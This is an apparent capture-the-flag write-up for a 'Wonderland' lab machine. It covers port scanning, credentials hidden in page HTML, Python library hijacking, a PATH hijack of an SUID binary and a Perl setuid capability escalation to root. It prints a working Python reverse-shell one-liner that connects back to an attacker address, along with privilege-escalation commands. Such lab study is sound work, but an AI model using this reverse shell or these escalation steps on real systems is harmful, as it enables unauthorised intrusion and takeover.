Fall down the rabbit hole and enter wonderland. Medium difficulty.
nmap -sC -sV -T4 10.10.144.50 -oN initial.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-15 19:29 BST
Nmap scan report for 10.10.144.50
Host is up (0.068s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.10 seconds
Starting with enumeration there’s nothing much to see. On to the web app.
Dirbusting quickly leads to this page, and a folder with some images. I run them through steghide and binwalk to see if there’s anything hidden inside but don’t find anything.
Further directory enumeration ends up at http://10.10.144.50/r/a/b/b/i/t/
Hidden in the HTML there’s our first set of creds.
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you're sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they're both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>alice:HowDothTheLittleCrocodileImproveHisShiningTail
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
Now logged in as Alice there’s potential privesc vector sudo -l.
The script imports random, and is inside Alice’s home directory so there’s potential library hijacking if we put a malicious reverse shell in random.py.
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.105.64",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
Now in Rabbit’s home directory we’ve a binary (teaParty) that’s an SUID. There’s nothing to view the binary with on the server so downloading to attacking machine shows the use of a relative path that we might be able to exploit to gain another shell…
Welcome to the tea party! The Mad Hatter will be here soon. /bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for him Segmentation fault (core dumped)
Changing the path of date…
rabbit@wonderland:/home/rabbit$ export PATH=$(pwd):$PATH export PATH=$(pwd):$PATH rabbit@wonderland:/home/rabbit$ which date which date /home/rabbit/date
Inside Hatter’s home directory is password.txt containing WhyIsARavenLikeAWritingDesk? which means I can kill all the shells and continue as Hatter.
There’s nothing immediately obvious in Hatter’s home folder so it’s time to do some basic enumeration and discover Perl with setuid capabilities.
hatter@wonderland:/$ getcap -r / 2>/dev/null /usr/bin/perl5.26.1 = cap_setuid+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/perl = cap_setuid+ep
So with a bit of help from GTFO bins can escalate to root and grab root.txt in Alice’s home folder then top into the root folder for the user.txt.
The initial enumeration through the Web app was silly but I enjoyed this room, relative path abuse and Lewis Caroll quotes. I got stuck in the rabbit hole of looking for steganography early on but thankfully there wasn’t any.